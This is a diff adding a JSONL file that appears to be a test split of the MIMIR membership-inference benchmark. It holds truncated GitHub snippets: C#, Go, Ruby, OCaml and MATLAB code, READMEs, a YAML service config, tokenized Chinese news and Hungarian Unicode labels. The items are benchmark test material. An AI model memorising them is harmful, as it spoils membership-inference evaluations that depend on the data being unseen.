diff --git "a/https:/huggingface.co/datasets/iamgroot42/mimir/tree/main/test/github_ngram_13_0.2.jsonl" "b/https:/huggingface.co/datasets/iamgroot42/mimir/tree/main/test/github_ngram_13_0.2.jsonl" new file mode 100644--- /dev/null +++ "b/https:/huggingface.co/datasets/iamgroot42/mimir/tree/main/test/github_ngram_13_0.2.jsonl" @@ -0,0 +1,740 @@ +"\nTo build a new release, a few steps are required. This will be enhanced in the future.\n\n1. Update FireCamp software release version\n1) Change the version in Makefile from \"latest\" to the release version such as \"1.0\".\n2) Chagne the version in common/types.go from \"latest\" to the release version such as \"1.0\".\n3) Update the \"Release\" to such as \"1.0\" and \"QSS3KeyPrefix\" to \"firecamp/releases/1.0\" in firecamp-master.template and firecamp.template\n\nUpdate the README.md and docs/installation/README.md to the new version as well.\n\nCheck whether need to update AMI ID in firecamp-autoscalegroup.template, https://aws.amazon.com/amazon-linux-ami/\n\n2. Upload the new files\nCreate the new release folder in the \"cloudstax\" bucket, such as firecamp/releases/1.0. Create subfolders: \"templates\", \"scripts\", \"packages\". Upload all templates under packages/aws-cloudformation/ to \"templates\", upload packages/aws-cloudformation/init.sh to \"scripts\", and upload $GOPATH/bin/firecamp-service-cli.tgz and $GOPATH/bin/firecamp-swarminit.tgz to \"packages\". The swarminit command is used by packaging/aws-cloudformation/init.sh to initialize the Docker Swarm cluster.\n\nNote: the default template allows '.' in the QSS3KeyPrefix. AWS QuickStart always points to the latest version, such as aws/vpc/latest for QSAWSVPCS3KeyPrefix, and '.' is not allowed in the key prefix. For the new release, when updating the AWS QuickStart git, remove '.' in the QSS3KeyPrefix and point to the latest version in QuickStart.\nAlso change \"QSS3BucketName\"" +"\ufeffusing System;\n\nnamespace RGiesecke.DllExport\n{\n public class ProblemSolver: IProblemSolver\n {\n /// \n /// Found problem.\n /// \n public Problems.IProblem Found\n {\n get;\n protected set;\n }\n\n /// \n /// Initial exception.\n /// \n public Exception Raw\n {\n get;\n protected set;\n }\n\n /// \n /// Formatted message.\n /// \n public string FMsg\n {\n get\n {\n var p = Found;\n if(p == null || (p.Message == null && p.HowToSolve == null)) {\n return null;\n }\n\n if(p.Message == null) {\n return $\"To solve problem: {p.HowToSolve}\";\n }\n\n var L = Environment.NewLine;\n return $\"{p.Title} ::::::{L}{p.Message}{ (p.HowToSolve != null ? L + p.HowToSolve : \"\") }\";\n }\n }\n\n public ProblemSolver(Exception ex)\n {\n init(ex);\n }\n\n protected void init(Exception ex)\n {\n Raw = ex;\n selector(ex);\n }\n\n protected void selector(Exception ex)\n {\n if(ex.GetType() == typeof(InvalidOperationException)) {\n exinit((InvalidOperationException)ex);\n return;\n }\n }\n\n protected void exinit(InvalidOperationException ex)\n {\n if(ex.Message.Contains(\"0x80070005\")) {\n Found = new Problems.AccessDenied(ex);\n return;\n }\n }\n }\n}" +"%SJGET_EXAMPLE a demo for SJget.\n% This example script gets the index file of the SJSU Singular matrix collection,\n% and then loads in all symmetric non-binary matrices, in increasing order of\n% number of rows in the matrix.\n%\n% Example:\n% type SJget_example ; % to see an example of how to use SJget\n%\n% See also SJget, SJweb, SJgrep.\n\n% Derived from the UFget toolbox on March 18, 2008.\n% Copyright 2007, Tim Davis, University of Florida.\n\n% modified by L. Foster 09/17/2008\n\ntype SJget_example ;\n\nindex = SJget ;\n% find all symmetric matrices that are not binary,\n% have at least 4000 column and have a gap in the singular\n% values at the numerical rank of at least 1000\nf = find (index.numerical_symmetry == 1 & ~index.isBinary & ...\n index.ncols >= 4000 & index.gap >= 1000 );\n% sort by the dimension of the numerical null space\n[y, j] = sort (index.ncols (f) - index.numrank (f) ) ;\nf = f (j) ;\n\nfor i = f\n fprintf ('Loading %s%s%s, please wait ...\\n', ...\n\tindex.Group {i}, filesep, index.Name {i}) ;\n Problem = SJget (i,index) ;\n %display the problem structure\n disp (Problem) ;\n %" +"var assert = require('assert');\nvar appStatsParser = require('../../lib/parsers/appStats');\n\nsuite('app stats parser', function() {\n test('single metric', function(){\n var date = new Date();\n var timestamp = date.getTime();\n var postData = {\n host: \"the-host\",\n appId: \"the-app-id\",\n startTime: timestamp,\n appStats: {\n release: \"the-release\",\n packageVersions: {\n foo: null,\n bar: null\n },\n appVersions: [\n {name: 'webapp', version: \"v-webapp\"},\n {name: 'refreshable', version: \"v-refreshable\"},\n {name: 'cordova', version: \"v-cordova\"},\n ]\n }\n };\n var expectedResult = [\n {\n value: {\n host: \"the-host\",\n appId: \"the-app-id\",\n startTime: timestamp,\n release: \"the-release\",\n packageVersions: {\n foo: null,\n bar: null\n },\n appVersions: [\n {name: 'webapp', version: \"v-webapp\"},\n {name: 'refreshable', version: \"v-refreshable\"},\n {name: 'cordova', version: \"v-cordova\"},\n ]\n }\n }\n ];\n var out = appStatsParser(postData);\n out[0].value.startTime = out[0].value.startTime.getTime();\n delete out[0]._id;\n assert.deepEqual(out, expectedResult);\n });\n});" +"package internal\n\nimport (\n\t\"github.com/johnfercher/maroto/pkg/props\"\n\t\"github.com/jung-kurt/gofpdf\"\n)\n\n// Signature is the abstraction which deals of how to add a signature space inside PDF\ntype Signature interface {\n\tAddSpaceFor(label string, cell Cell, textProp props.Text)\n}\n\ntype signature struct {\n\tpdf gofpdf.Pdf\n\tmath Math\n\ttext Text\n}\n\n// NewSignature create a Signature\nfunc NewSignature(pdf gofpdf.Pdf, math Math, text Text) *signature {\n\treturn &signature{\n\t\tpdf,\n\t\tmath,\n\t\ttext,\n\t}\n}\n\n// AddSpaceFor create a space for a signature inside a cell\nfunc (s *signature) AddSpaceFor(label string, cell Cell, textProp props.Text) {\n\tleft, top, _, _ := s.pdf.GetMargins()\n\tspace := 4.0\n\n\tlineCenterY := cell.Height / 1.33\n\tcell.Y += lineCenterY\n\n\ts.pdf.Line(cell.X+left+space, cell.Y+top, cell.X+cell.Width+left-space, cell.Y+top)\n\n\tcell.Y += 2.0\n\ts.text.Add(label, cell, textProp)\n}" +"### Skydock - Automagic Service Discovery for [Docker](https://github.com/dotcloud/docker)\n[![Build Status](https://travis-ci.org/crosbymichael/skydock.png)](https://travis-ci.org/crosbymichael/skydock)\n\n\n## NOTICE\n\nI plan on making some breaking changes soon to help skydns and skydock scale better. To stay up-to-date either\nwatch this repo or follow me on twitter @crosbymichael. \n\n\nSkydock monitors docker events when containers start, stop, die, kill, etc and inserts records into a dynamic\nDNS server [skydns](https://github.com/skynetservices/skydns1). This allows standard DNS queries for services\nrunning inside docker containers. Because lets face it, if you have to modify your application code to work\nwith other service discovery solutions you might as well just give up. DNS just works and it works well. \nAlso you cannot be expected to modify application code that you don't own. Passing service urls via the\ncli or in static config files (nginx) will not be possible if your service discovery solution requires\na client library just to fetch an IP. \n\n\n[Skydns](https://github.com/skynetservices/skydns1) is a very small and simple server that does DNS for \ndiscovery very well. The authors and contributors to skydns helped a lot to make this project possible.\nSkydns exposes a very simple REST API to add, update, and remove services.\n\n\n#### The Details\n\nWhen you start a container with docker an" +"# Container Hierarchy\n\nA container hierarchy is a tree of containers for the purposes of sharing the registrations of dependency injections. Service types registered to a parent container can be resolved in its child containers too. Use `init(parent: Container)` to instantiate a child container while specifying its parent container:\n\n```swift\nlet parentContainer = Container()\nparentContainer.register(Animal.self) { _ in Cat() }\nlet childContainer = Container(parent: parentContainer)\n\nlet cat = childContainer.resolve(Animal.self)\nprint(cat != nil) // prints \"true\"\n```\n\nIn contrast, service types registered to a child container are _not_ resolved in its parent container:\n\n```swift\nlet parentContainer = Container()\nlet childContainer = Container(parent: parentContainer)\nchildContainer.register(Animal.self) { _ in Cat() }\n\nlet cat = parentContainer.resolve(Animal.self)\nprint(cat == nil) // prints \"true\"\n```\n\n_[Next page: Modularizing Service Registration (Assembly)](Assembler.md)_\n\n_[Table of Contents](README.md)_" +"using System;\r\nusing System.Drawing;\r\nusing System.Globalization;\r\nusing System.Xml;\r\nnamespace MSR.CVE.BackMaker\r\n{\r\n\tpublic class XMLUtils\r\n\t{\r\n\t\tpublic const string sizeTag = \"Size\";\r\n\t\tprivate const string widthAttr = \"Width\";\r\n\t\tprivate const string heightAttr = \"Height\";\r\n\t\tpublic static Size ReadSize(MashupParseContext context)\r\n\t\t{\r\n\t\t\tXMLTagReader xMLTagReader = context.NewTagReader(\"Size\");\r\n\t\t\tSize result = new Size(context.GetRequiredAttributeInt(\"Width\"), context.GetRequiredAttributeInt(\"Height\"));\r\n\t\t\txMLTagReader.SkipAllSubTags();\r\n\t\t\treturn result;\r\n\t\t}\r\n\t\tpublic static void WriteSize(Size size, XmlTextWriter writer)\r\n\t\t{\r\n\t\t\twriter.WriteStartElement(\"Size\");\r\n\t\t\twriter.WriteAttributeString(\"Width\", size.Width.ToString(CultureInfo.InvariantCulture));\r\n\t\t\twriter.WriteAttributeString(\"Height\", size.Height.ToString(CultureInfo.InvariantCulture));\r\n\t\t\twriter.WriteEndElement();\r\n\t\t}\r\n\t\tpublic static void WriteStringXml(XmlTextWriter writer, string TagName, string value)\r\n\t\t{\r\n\t\t\twriter.WriteStartElement(TagName);\r\n\t\t\twriter.WriteString(value);\r\n\t\t\twriter.WriteEndElement();\r\n\t\t}\r\n\t\tpublic static string ReadStringXml(MashupParseContext context, string TagName)\r\n\t\t{\r\n\t\t\tXMLTagReader xMLTagReader = context.NewTagReader(TagName);\r\n\t\t\txMLTagReader.SkipAllSubTags();\r\n\t\t\treturn xMLTagReader.GetContent();\r\n\t\t}\r\n\t}\r\n}" +"// Copyright (c) Microsoft Corporation.\n// Licensed under the MIT license.\n\n// This node built-in must be shimmed for the browser.\nimport EventEmitter from \"events\";\n// This is a node dependency that needs to be replaced with a\n// different implementation in the browser.\nimport print from \"./print\";\nexport { print };\n\nexport { AzureKeyCredential, KeyCredential } from \"@azure/core-auth\";\n\n// this is a utility function from a library that should be external\n// for both node and web\nimport { isNode } from \"@azure/core-http\";\n\n// exporting some value from a dependency\nexport { URLBuilder } from \"@azure/core-http\";\n\nexport function createEventEmitter(): EventEmitter {\n // use event emitter\n const e = new EventEmitter();\n\n // Dynamic Node and browser-specific code\n if (isNode) {\n console.log(\"Node \ud83d\udc4a\");\n } else {\n console.log(\"Browser \u2764\");\n }\n\n print(\"Created event emitter\");\n\n return e;\n}" +"var data = [{\n name: \"creativity\",\n weight: 31\n}, {\n name: \"creative\",\n weight: 22\n}, {\n name: \"intelligence\",\n weight: 15\n}, {\n name: \"more\",\n weight: 12\n}, {\n name: \"people\",\n weight: 12\n}, {\n name: \"theory\",\n weight: 11\n}, {\n name: \"problem\",\n weight: 11\n}, {\n name: \"thinking\",\n weight: 11\n}, {\n name: \"been\",\n weight: 11\n}, {\n name: \"can\",\n weight: 11\n}, {\n name: \"process\",\n weight: 11\n}, {\n name: \"new\",\n weight: 10\n}, {\n name: \"individual\",\n weight: 10\n}, {\n name: \"model\",\n weight: 10\n}, {\n name: \"ideas\",\n weight: 9\n}, {\n name: \"levels\",\n weight: 9\n}, {\n name: \"processes\",\n weight: 9\n}, {\n name: \"different\",\n weight: 9\n}, {\n name: \"high\",\n weight: 9\n}, {\n name: \"motivation\",\n weight: 9\n}, {\n name: \"research\",\n weight: 9\n}, {\n name: \"work\",\n weight: 8\n}, {\n name: \"cognitive\",\n weight: 8\n}, {\n name: \"team\",\n weight: 8\n}, {\n name: \"divergent\",\n weight: 8\n}, {\n name: \"tests\",\n weight: 8\n}, {\n name: \"study\",\n weight: 8\n}, {\n name: \"measures\",\n weight: 8\n}, {\n name: \"theories\",\n weight: 8\n}, {\n name: \"found\",\n weight: 8\n}, {\n name: \"solving\",\n weight: 7\n}, {\n name: \"knowledge\",\n weight: 7\n}, {\n name: \"iq\",\n weight: 7" +"require 'java'\nrequire 'purugin/predicate'\n\nclass cb::CraftWorld\n extend Purugin::Predicate\n \n ##\n # Get the block at the given coordinates\n # === Parameters\n # * _x_,_y_,_z_ - Give three coord. location\n # * _location_ - Provide a location object\n # === Examples\n # e.player.world.block_at(20, 20, 20) #=> Block instance\n # e.player.world.block_at(Location.new(20, 20, 20)) #=> ditto\n #\n def block_at(*r)\n getBlockAt *r\n end\n \n ##\n # Gets the chunk that this location is within.\n # === Parameters\n # * _location_ - location within the chunk you are asking for\n # === Examples\n # e.player.world.chunk_at(me) #=> Location coerced from your location\n # e.player.world.chunk_at(some_location) #=> Give an explicit location\n def chunk_at(location)\n location = location.respond_to?(:to_loc) ? location.to_loc : location\n \n getChunkAt(location)\n end\n \n ##\n # Is the provided chunk currently loaded by this world. This also can be called\n # with the\n # === Parameters\n # * _chunk_or_x_ * - is the chunk instance you are inquiring about or it is x coordinate\n # * z * - is optional for the [x,y] version of this method.\n # === Examples\n # e.player.world.chunk_loaded? some_chunk\n # e.player.world.chunk_loaded?(30, 13)\n def chunk_loaded?(chunk_or_x, z=nil)\n z ? isChunkLoaded(chunk_or_x, z) : isChunkLoaded(chunk_or_x)\n end\n\n ##\n # Is the chunk being actively used by players (also must be loaded).\n #" +"import { isFunction } from 'lodash'\nimport { vuex as Auth } from '../auth'\n\n// start extraction data from vuex modules\nconst vuex = { Auth };\nconst keys = Object.keys(vuex);\n\n// process and extract data (modules and plugins)\n/**\n * this is a full functional approach\n * this code use reduce end immutability with spread operator to generate new object and array\n * refs\n * - https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/Reduce\n * - https://developer.mozilla.org/pt-BR/docs/Web/JavaScript/Reference/Operators/Spread_operator\n * - https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Functions/Arrow_functions\n *\n * Immutability is very important concept from functional programming, that's prevents side effects\n * Together with the syntax of arrow function make the code more concise\n *\n * plugins have additional treatment, with `.filter`, because not every module has plugins\n */\nconst modules = keys.reduce((acc, key) => ({ ...acc, [key]: vuex[key].module }), {})\nconst plugins = keys.reduce((acc, key) => [...acc, vuex[key].plugin], []).filter(isFunction)\n/**\n * semi-functional version\n * const modules = keys.reduce((acc, key) => {\n * acc[key] = vuex[key].module\n * return acc // without immutability\n * return { ...acc } // with immutability\n * }, {})\n *\n * const plugins = keys.reduce((acc, key) => {\n * acc.push(vuex[key].plugins)\n * return acc // without immutability\n * return [...acc] // with immutability\n * }).filter(plugin => isFunction(plugin))\n */\n// end" +"% BTF ordering toolbox:\n%\n% Primary functions:\n%\n% btf - permute a square sparse matrix into upper block triangular form\n% maxtrans - permute the columns of a sparse matrix so it has a zero-free diagonal\n% strongcomp - symmetric permutation to upper block triangular form\n%\n% Other:\n% btf_install - compile and install BTF for use in MATLAB.\n% btf_demo - demo for BTF\n% drawbtf - plot the BTF form of a matrix\n% btf_make - compile BTF for use in MATLAB\n%\n% Example:\n% q = maxtrans (A)\n% [p,q,r] = btf (A)\n% [p,r] = strongcomp (A)\n\n% Copyright 2004-2007, University of Florida" +"@title Support Resources\n@short Support\n@group intro\n\nResources for reporting bugs, requesting features, and getting support.\n\nOverview\n========\n\nThis document describes available support resources.\n\nThe upstream provides free support for a narrow range of problems (primarily,\nsecurity issues and reproducible bugs) and paid support for virtually anything.\n\nThe upstream does not provide free support for general problems with installing\nor configuring Phabricator. You may be able to get some help with these\nkinds of issues from the community.\n\n\nPaid Support\n============\n\nIf you'd like upstream support, see ((pacts)).\n\nThis is the only way to request features and the only way to get guaranteed\nanswers from experts quickly.\n\n\nReporting Security Vulnerabilities\n==================================\n\nThe upstream accepts, fixes, and awards bounties for reports of material\nsecurity issues with the software.\n\nTo report security issues, see @{article:Reporting Security Vulnerabilities}.\n\n\nReporting Bugs\n==============\n\nThe upstream will accept **reproducible** bug reports in modern, first-party\nproduction code running in reasonable environments. Before submitting a bug\nreport you **must update** to the latest version of Phabricator.\n\nTo report bugs, see @{article:Contributing Bug Reports}.\n\n\n\nContributing\n============\n\nPhabricator is a very difficult project to contribute to. New contributors\nwill face a high barrier to entry.\n\nIf you'd like to contribute" +"{% load nav_tags %}\n\n{% if is_site_map %}\n
  • {% spaceless %}\n \n {% trans item.label|safe %}\n {% endspaceless %}\n\n {% if item.children %}\n \n {% endif %}\n
  • \n{% else %}\n
  • {% spaceless %}\n \n {% trans item.label|safe %}\n {% endspaceless %}\n\n {% if item.children %}\n \n {% endif %}\n
  • \n{% endif %}" +"Intro\n-----\nThis example demonstrates how to simply set up a database for export in a\nread-only manner.\n\nExecute with -h or --help to see the available command-line options.\n\nSetup\n-----\n\nThe country table (country.sql) can be used for sample data in the database\nof your choice.\n\nSet up the connection in code (method SetUpConnection), \nor in a connection.ini file with the following format:\n\n[database]\nType=postgresql\nDatabaseName=YourDatabase\nHost=localhost\nusername=me\npassword=secret\nport=nnnn\n\nYou can use another name as connection.ini, but then you must specify the\nname with the -c or --config option.\n\nOnce started, the server will display connection info and available resources.\n\n\nThings to try\n-------------\nThe following list possible queries, using either wget or curl:\n(obviously, you can do the same in a browser)\n\nGet a list of available resources:\nwget -q -O - \"http://localhost:3000/metadata/\"\ncurl -o - \"http://localhost:3000/metadata/\"\n\nSame, but only the names, in compact format:\nwget -q -O - \"http://localhost:3000/metadata/?fl=name&fmt=csv&metadata=0\"\ncurl -o - \"http://localhost:3000/metadata/?fl=name&fmt=csv&metadata=0\"\n\n\nGet metadata for country table:\n\nwget -q -O - \"http://localhost:3000/metadata/country\"\ncurl -o - \"http://localhost:3000/metadata/country\"\n\nOnly get fieldnames:\nwget -q -O - \"http://localhost:3000/metadata/country?fl=name&fmt=csv\"\ncurl -o - \"http://localhost:3000/metadata/country?fl=name&fmt=csv\"\n\nGet a list of all countries:\n\nwget -q -O - http://localhost:3000/country\ncurl -o - http://localhost:3000/country\n\nGet a" +"configs:\n buildkitd-config:\n buildkitd.toml: |\n debug=true\n [gc]\n enabled=false\n [worker.oci]\n enabled=true\n gc=false\n gckeepstorage=1073741824\n [grpc]\n address = [ \"tcp://0.0.0.0:8080\" ]\n # debugAddress is address for attaching go profiles and debuggers.\n debugAddress = \"0.0.0.0:6060\"\n\nservices:\n buildkitd:\n version: v0\n serviceMesh: false\n image: \"moby/buildkit:v0.6.1\"\n ports:\n - 8080/http,buildkit,expose=false\n privileged: true\n configs:\n - buildkitd-config:/etc/buildkit\n containers:\n - name: registry\n image: \"registry:2\"\n env:\n - REGISTRY_HTTP_ADDR=0.0.0.0:80\n ports:\n - 80:80/tcp,registry,expose=false\n volume:\n - rio-registry:/var/lib/registry,persistent=${PERSISTENT}\n webhook:\n version: v0\n global_permissions:\n - \"* gitwatcher.cattle.io/gitwatchers\"\n - \"* gitwatcher.cattle.io/gitcommits\"\n - '* configmaps'\n - '* events'\n - get,list pods\n - create,get,list /pods/log\n - secrets\n image: rancher/gitwatcher:v0.4.5\n args:\n - gitwatcher\n - --listen-address\n - :8090\n imagePullPolicy: always\n ports:\n - 8090/http,http-webhook\n\ntemplate:\n envSubst: true\n questions:\n - variable: PERSISTENT\n description: \"Use PV to store registry data\"" +"# frozen_string_literal: true\n\nclass Pry\n class Command\n class Ls < Pry::ClassCommand\n module MethodsHelper\n include Pry::Command::Ls::JRubyHacks\n\n private\n\n # Get all the methods that we'll want to output.\n def all_methods(instance_methods = false)\n methods = if instance_methods || @instance_methods_switch\n Pry::Method.all_from_class(@interrogatee)\n else\n Pry::Method.all_from_obj(@interrogatee)\n end\n\n if Pry::Helpers::Platform.jruby? && !@jruby_switch\n methods = trim_jruby_aliases(methods)\n end\n\n methods.select { |method| @ppp_switch || method.visibility == :public }\n end\n\n def resolution_order\n if @instance_methods_switch\n Pry::Method.instance_resolution_order(@interrogatee)\n else\n Pry::Method.resolution_order(@interrogatee)\n end\n end\n\n def format(methods)\n methods.sort_by(&:name).map do |method|\n if method.name == 'method_missing'\n color(:method_missing, 'method_missing')\n elsif method.visibility == :private\n color(:private_method, method.name)\n elsif method.visibility == :protected\n color(:protected_method, method.name)\n else\n color(:public_method, method.name)\n end\n end\n end\n end\n end\n end\nend" +"\ufeffusing static PKHeX.Core.LegalityCheckStrings;\n\nnamespace PKHeX.Core\n{\n /// \n /// Verifies the data.\n /// \n public sealed class NHarmoniaVerifier : Verifier\n {\n protected override CheckIdentifier Identifier => CheckIdentifier.Trainer;\n\n public override void Verify(LegalityAnalysis data)\n {\n var pkm = data.pkm;\n var EncounterMatch = data.EncounterMatch;\n\n bool checksRequired = EncounterMatch is EncounterStatic5N;\n if (pkm is PK5 pk5)\n {\n bool has = pk5.NPok\u00e9mon;\n if (checksRequired && !has)\n data.AddLine(GetInvalid(LG5SparkleRequired, CheckIdentifier.Fateful));\n if (!checksRequired && has)\n data.AddLine(GetInvalid(LG5SparkleInvalid, CheckIdentifier.Fateful));\n }\n\n if (!checksRequired)\n return;\n\n if (pkm.IVTotal != 30*6)\n data.AddLine(GetInvalid(LG5IVAll30, CheckIdentifier.IVs));\n if (!VerifyNsPKMOTValid(pkm))\n data.AddLine(GetInvalid(LG5ID_N, CheckIdentifier.Trainer));\n if (pkm.IsShiny)\n data.AddLine(GetInvalid(LG5PIDShinyN, CheckIdentifier.Shiny));\n }\n\n private static bool VerifyNsPKMOTValid(PKM pkm)\n {\n if (pkm.TID != 00002 || pkm.SID != 00000)\n return false;\n var ot = pkm.OT_Name;\n if (ot.Length != 1)\n return false;\n var c = Legal.GetG5OT_NSparkle(pkm.Language);\n return c == ot;\n }\n }\n}" +"open! Import\n\nlet failwithf = Printf.failwithf\n\nmodule Stable = struct\n module V1 = struct\n module T = struct\n type t =\n | Sun\n | Mon\n | Tue\n | Wed\n | Thu\n | Fri\n | Sat\n [@@deriving bin_io, compare, hash, quickcheck]\n\n let to_string t =\n match t with\n | Sun -> \"SUN\"\n | Mon -> \"MON\"\n | Tue -> \"TUE\"\n | Wed -> \"WED\"\n | Thu -> \"THU\"\n | Fri -> \"FRI\"\n | Sat -> \"SAT\"\n ;;\n\n let to_string_long t =\n match t with\n | Sun -> \"Sunday\"\n | Mon -> \"Monday\"\n | Tue -> \"Tuesday\"\n | Wed -> \"Wednesday\"\n | Thu -> \"Thursday\"\n | Fri -> \"Friday\"\n | Sat -> \"Saturday\"\n ;;\n\n let of_string_internal s =\n match String.uppercase s with\n | \"SUN\" | \"SUNDAY\" -> Sun\n | \"MON\" | \"MONDAY\" -> Mon\n | \"TUE\" | \"TUESDAY\" -> Tue\n | \"WED\" | \"WEDNESDAY\" -> Wed\n | \"THU\" | \"THURSDAY\" -> Thu\n | \"FRI\" | \"FRIDAY\" -> Fri\n | \"SAT\" | \"SATURDAY\" -> Sat\n | _ -> failwithf \"Day_of_week.of_string: %S\" s ()\n ;;\n\n let of_int_exn i =\n match i with\n | 0 -> Sun\n | 1 -> Mon\n | 2 -> Tue\n | 3 -> Wed\n | 4 -> Thu\n | 5" +"[![Code Climate](https://codeclimate.com/github/codelitt/launchpage-rails/badges/gpa.svg)](https://codeclimate.com/github/codelitt/launchpage-rails)\n[![Test Coverage](https://codeclimate.com/github/codelitt/launchpage-rails/badges/coverage.svg)](https://codeclimate.com/github/codelitt/launchpage-rails/coverage)\n[![Build Status](https://semaphoreci.com/api/v1/projects/9bc21553-c95d-4769-9ea7-a3af17dc4fd1/478931/badge.svg)](https://semaphoreci.com/codelitt/launchpage-rails) \n\n\nThis is a quick application to get up and running quickly with your new\nstartup idea so you can focus on your actual product. It is a prelaunch\nMVP landing page aimed at gathering signups and testing market interest.\nIt was originally written as an open source alternative to LaunchRock.\nIt is written with Ruby on Rails. Originally, we needed an application\nthat provided signup for two types of users for a two-sided market. It's\nout of the box, ready to go. Just add styling. Fork and enjoy!\n\n*It may have a bit of our content, but it wouldn't take you too long to\nchange it to fit your need. Just a heads up.*\n\n### Example\n\nHere is an example of the launchpage once it's all styled/designed\n(although, both the project and design are old):\n[Backstagr](http://www.backsta.gr)\n\n### Features\n\n1. Email collection for two types of users\n\n2. Social sharing\n\n3. Auto mailer\n\n4. Ability to export user emails via CSV\n\n5. Post signup survey and questionaire to gather more market research\n from your beta users.\n\n**Coming soon**\n\n6. Waiting list social actions (i.e. move up the list if you share to 3\n friends or" +"\n \u3000\u4e94 \u4e4b\u540e \u80a1\u5e02 \u706b\u7206 \u8fde\u7eed \u5929\u5927 \u4e00\u4e3e \u7a81\u7834 \u4e94\u5927 \u6295\u8d44\u8005 \u878d\u901a \u57fa\u91d1 \u7ba1\u7406 \u516c\u53f8 \u9996\u5e2d \u5206\u6790\u5e08 \u878d\u901a \u884c\u4e1a \u666f\u6c14 \u57fa\u91d1 \u7ecf\u7406 \u51af\u5b87\u8f89 \u8868\u793a \u706b\u7206 \u57fa\u672c\u9762 \u91cd\u4e8e \u6700\u91cd\u8981 \u9009\u80a1 \n \u6295\u8d44\u8005 \u660e\u767d \u575a\u6301 \n \u3000\u51af \u8868\u793a \u57fa\u91d1 \u7ecf\u7406 \u540c\u6837 \u82e6\u82e6 \u575a\u6301 \u7ecf\u9a8c \u53bb\u5e74 \u878d\u901a \u884c\u4e1a \u7814\u7a76\u5458 \u5b9e\u5730 \u8c03\u7814 \u63a8\u8350 \u5e7f\u8239 \u56fd\u9645 \u5f53\u65f6 \u53d7\u7d2f \u94a2\u6750 \u4ef7\u683c \u8fde\u5e74 \u4e0a\u6da8 \u56fd\u5185 \u9020\u8239\u4e1a \u4e00\u76f4 \u5904\u4e8e \u4e0b\u964d \u901a\u9053 \u5e7f\u8239 \u56fd\u9645 \u4e1a\u7ee9 \u60c5\u51b5 \u7406\u60f3 \u6ca1\u6709 \u4e00\u5bb6 \u57fa\u91d1 \u770b\u597d \u6295\u8d44 \u5e7f\u8239 \u56fd\u9645 \u9999\u6e2f \u5e02\u573a \u4e00\u76f4 \u4f4e\u8ff7 \n \u516c\u53f8 \u53ec\u5f00 \u4e13\u9898 \u8bba\u8bc1\u4f1a \u6fc0\u70c8 \u8ba8\u8bba \u516c\u53f8 \u5185\u90e8 \u5f62\u6210 \u5171\u8bc6 \u9020\u8239\u4e1a \u6b63\u5904\u4e8e \u884c\u4e1a \u666f\u6c14 \u5468\u671f \u62d0\u70b9 \u5e7f\u8239 \u56fd\u9645 \u8ba2\u5355 \u60c5\u51b5 \u672a\u6765 \u4e1a\u7ee9 \u5927\u5e45\u5ea6 \u63d0\u5347 \u878d\u901a \u884c\u4e1a \u666f\u6c14 \u57fa\u91d1 \u57fa\u91d1 \u901a\u4e7e \u51b3\u5b9a \u91cd\u4ed3 \u4ecb\u5165 \n \u5176\u540e \u76f8\u5f53 \u65f6\u95f4 \u878d\u901a \u57fa\u91d1 \u4e00\u5bb6 \u673a\u6784 \u770b\u597d \u5e7f\u8239 \u56fd\u9645 \u4ef7\u683c \u4f9d\u7136 \u4f4e\u8ff7 \u53bb\u5e74 \u60c5\u51b5 \u53d8\u5f97 \u4ef7\u683c \u6700\u4f4e \u4e0b\u8dcc \u4ef7\u683c 60% \u5de6\u53f3 \u5f53\u65f6 \u62e5\u6709 \u4e0a\u5e02\u516c\u53f8 \u80a1\u4ef7 \u666e\u904d \u63a5\u8f68 \u4f4e\u4e8e \u4e0d\u5728\u5c11\u6570 \u57fa\u91d1 \u7ecf\u7406 \u5b87\u8f89 \u5766\u627f \u611f\u5230 \u538b\u529b \u5de8\u5927 \u575a\u6301 \u4e0b\u6765 \u516c\u53f8 \u57fa\u672c\u9762 \u4e86\u89e3 \u6e05\u695a \u76f8\u4fe1 \u6700\u7ec8 \u5e02\u573a \u8ba4\u53ef \n \u3000\u51af \u5f88\u5feb \u7ed3\u675f \u96be\u71ac \u65e5\u5b50 \u9999\u6e2f \u5e02\u573a \u7ec8\u4e8e \u8ba4\u8bc6\u5230 \u5e7f\u8239 \u56fd\u9645 \u6295\u8d44 \u4ef7\u503c \u7387\u5148 \u5e26\u52a8 \u8fc5\u901f \u8d70\u9ad8 \u8fdb\u5165 \u5e7f\u8239 \u56fd\u9645 \u4ef7\u683c \u8d85\u8fc7 \u76ee\u524d \u5e7f\u8239 \u56fd\u9645 \u80a1\u6539 \u505c\u724c \u505c\u724c \u6536\u62a5 \u53bb\u5e74 \u4ef7\u683c \u76f8\u6bd4 \u51fa\u5934 \u878d\u901a \u65d7\u4e0b \u57fa\u91d1 \u5e7f\u8239 \u56fd\u9645 \u83b7\u5229 \u8d85\u8fc7 100% \n \u5e02\u573a \u5df2\u7ecf \u80fd\u591f" +"control-character : Vez\u00e9rl\u0151karakterek\nbasic-latin : Latin (alap)\nlatin-1-supplement : Latin-1 kieg\u00e9sz\u00edt\u0151 karakterek\nlatin-extended-a : B\u0151v\u00edtett Latin (A)\nlatin-extended-b : B\u0151v\u00edtett Latin (B)\nipa-extensions : IPA kiterjeszt\u00e9sek\nspacing-modifier-letters : Fonetikus jelek\ncombining-diacritical-marks : Kombin\u00e1lt diakritikus jelek\ngreek-coptic : G\u00f6r\u00f6g \u00e9s Kopt\ncyrillic : Cirill\ncyrillic-supplement : Cirill kieg\u00e9sz\u00edt\u0151 karakterek\narmenian : \u00d6rm\u00e9ny\nhebrew : H\u00e9ber\narabic : Arab\nsyrian : Sz\u00edr\narabic-supplement : Arab kieg\u00e9sz\u00edt\u0151 karakterek\nthaana : Thaana\nnko : Nko\nsamaritan : Szamarit\u00e1n\nmandaic : Mandaic\narabic-extended-a : Kiterjesztett Arab (A)\ndevanagari : D\u00e9van\u00e1gari\nbengali : Beng\u00e1li\ngurmukhi : Gurmukhi\ngujarati : Gudzsarati\noriya : Orija\ntamil : Tamil\ntelugu : Telugu\nkannada : Kannada\nmalayalam : Malayalam\nsinhala : Sinhala\nthai : Thai\nlao : Lao\ntibetan : Tibeti\nmyanmar : Burmai\ngeorgian : Gr\u00faz\nhangul-jamo : Hangul Jamo\nethiopic : Eti\u00f3p\nethiopic-supplement : Eti\u00f3p kieg\u00e9sz\u00edt\u0151 karakterek\ncherokee : Cseroki\nunified-canadian-aboriginal-syllabics : Egyszer\u0171s\u00edtett kanadai bennsz\u00fcl\u00f6tt jelek\nogham : Ogham\nrunic 